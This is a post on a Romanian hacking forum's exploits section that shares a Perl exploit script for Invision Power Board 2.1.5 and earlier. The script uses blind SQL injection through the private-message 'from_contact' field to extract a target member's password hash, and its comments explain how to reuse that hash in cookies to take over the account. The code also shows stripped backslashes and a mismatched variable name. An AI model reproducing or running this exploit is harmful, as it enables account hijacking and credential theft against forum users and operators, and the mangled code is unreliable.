Hacking and more...
HaCkinG CulT
Lista Forumurilor Pe Tematici
Hacking and more... | Reguli | Inregistrare | Login

POZE HACKING AND MORE...

Nu sunteti logat.
Nou pe simpatie:
bruneta99 la Simpatie.ro
Femeie
25 ani
Satu Mare
cauta Barbat
25 - 50 ani
Hacking and more... / Exploituri si POCs / Invision Power Board <= 2.1.5 (from_contact) SQL Injection Exploit Moderat de Shocker
Autor
Mesaj Pagini: 1
epic
User

Inregistrat: acum 18 ani
Postari: 1896


Code:

#!/usr/bin/perl
#############################################################################
## IPB <=2.1.4 exploit (possibly 2.1.5 too)                                ##
## Brought to you by the Ykstortion security team.                         ##
##                                                                         ##
## The bug is in the pm system so you must have a registered user.         ##
## The exploit will extract a password hash from the forum's data base of  ##
## the target user.                                                        ##
## You need to know the target user's member ID but it's not difficult to  ##
## find out, just look under their avatar next to one of their posts.      ##
## Once you have the hash, simply unset all forum cookies and set          ##
## member_id to the target user's member id and pass_hash to the hash      ##
## obtained from the database by this script.                              ##
##                                                                         ##
## Usage:                                                                  ##
##   $ ./ipb                                                               ##
##   IPB Forum URL ? forums.example.com/forums                             ##
##   Your username ? krypt_sk1dd13                                         ##
##   Your pass ? if_your_on_nix_this_gets_hidden                           ##
##   Target userid ? 3637                                                  ##
##                                                                         ##
##   Attempting to extract password hash from database...                  ##
##   537ab2d5b37ac3a3632f5d06e8e04368                                      ##
##   Hit enter to quit.                                                    ##
##                                                                         ##
## Requirements:                                                           ##
##   o Perl 5                                                              ##
##   o LWP 5.64 or later                                                   ##
##   o Internet access                                                     ##
##   o A forum you hate/dislike                                            ##
##   o A user on said forum                                                ##
##   o 32+ PMs left till your inbox is full, if not you can still delete   ##
##     PMs from your inbox as the successful ones come through             ##
##                                                                         ##
## Credit to: Nuticulus for finding the SQL injection                      ##
##                                                                         ##
## Have fun, you dumb skiddie.                                             ##
#############################################################################

use HTTP::Cookies;
use LWP 5.64;
use HTTP::Request;

# variables
my $login_page = '?act=Login&CODE=01';
my $pm_page = '?act=Msg&CODE=04';
my $pose_pm_page = '?';
my $tries = 5;
my $sql = '';
my $hash = '';
my $need_null = 0;
my $i;
my $j;
my @charset = ('0' .. '9', 'a' .. 'f');
my %form = (act        => 'Msg',
    CODE        => '04',
    MODE        => '01',
    OID        => '',
    removeattachid    => '',
    msg_title    => 'asdf',
    bbmode        => 'normal',
    ffont        => 0,
    fsize        => 0,
    fcolor        => 0,
    LIST        => ' LIST ',
    helpbox        => 'Insert Monotype Text (alt + p)',
    tagcount    => 0,
    Post        => 'jkl');
    

# objects
my $ua = LWP::UserAgent->new;
my $cj = HTTP::Cookies->new (file => "N/A", autosave => 0);
my $resp;

# init the cookie jar
$ua->cookie_jar ($cj);

# allow redirects on post requests
push @{ $ua->requests_redirectable }, "POST";

# get user input
print 'IPB Forum URL ? ';
chomp (my $base_url = <STDIN>);
print 'Your username ? ';
chomp (my $user = <STDIN>);
$form{entered_name} = $user;
print 'Your pass ? ';
# systems without stty will error otherwise
my $stty = -x '/bin/stty';
system 'stty -echo' if $stty;        # to turn off echoing
chomp (my $pass = <STDIN>);
system 'stty echo' if $stty;        # to turn it back on
print "n" if $stty;
print 'Target userid ? ';    # it'll say next to one of their posts
chomp (my $tid = <STDIN>);

# parse the given base url
if ($base_url !~ m#^http://#) { $base_url = 'http://' . $base_url }
if ($base_url !~ m#/$|index.php$#) { $base_url .= '/' }

do {
    $resp = $ua->post ($base_url . $login_page,
        [ UserName => $user,
          PassWord => $pass,
          CookieDate => 1,
        ]);
} while ($tries-- && !$resp->is_success());

# reset tries
$tries = 5;

# did we get 200 (OK) ?
if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "n" }

# was the pass right ?
if ($resp->content =~ /sorry, the password was wrong/i) {
    die "Error: password incorrect.n";
}

# get ourselves a post_key (and an auth_key too with newer versions)
do {
    $resp = $ua->get ($base_url . $pm_page);
} while ($tries-- && !$resp->is_success());

# reset tries
$tries = 5;

if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "n" }
if ($resp->content =~ m#<inputs+?type=["']?hidden["']?s+?name=["']?post_key["']?s+?value=["']?([0-9a-f]{32})["']?s+?/>#)
{
    $form{post_key} = $1;
} else {
    die "Error: couldn't get a post key.n";
}
if ($resp->content =~ m#<inputs+?type=["']?hidden["']?s+?name=["']?auth_key["']?s+?value=["']?([0-9a-f]{32})["']?s+/>#)
{
    $form{auth_key} = $1;
}

# turn off buffering so chars in the hash show up straight away
$| = 1;

print "nAttempting to extract password hash from database...n ";

OFFSET:
for ($i = 0; $i < 32; ++$i) {
    CHAR:
    for ($j = 0; $j < @charset; ++$j) {
        # reset tries
        $tries = 5;
        print "x08", $charset[$j];
        # build sql injection
        $sql = '-1 UNION SELECT ' . ($need_null ? '0, ' : '') . 'CHAR('
             . (join (',', map {ord} split ('', $user))) . ') FROM '
             . 'ibf_members WHERE id = ' . $tid . ' AND MID('
             . 'member_login_key, ' . ($i + 1) . ', 1) = CHAR('
             . ord ($charset[$j]) . ')';
        $form{from_contact} = $sql;
        $resp = $ua->post ($base_url . $post_pm_page, %form,
            referer => $base_url . $pm_page);
        if (!$resp->is_success()) {
            die "nError: " . $resp->status_line
              . "n" if (!$tries);
            --$tries;
            redo;
        }
        if ($resp->content =~ /sql error/i) {
            if ($need_null) {
                die "Error: SQL error.n";
            } else {
                $need_null = 1;
                redo OFFSET;
            }
        } elsif ($resp->content !~ /there is no such member/i) {
            # we have a winner !
            print ' ';
            next OFFSET;
        }
    }
    # uh oh, something went wrong
    die "nError: couldn't get a char for offset $in";
}
print "x08 x08nHit enter to quit.n";
<STDIN>;



_______________________________________
:< 4 8 15 16 23 42 *execute*
TOATA LUMEA ESTE INVITATA PE NOUL FORUM!

pus acum 18 ani
   
Pagini: 1  

Mergi la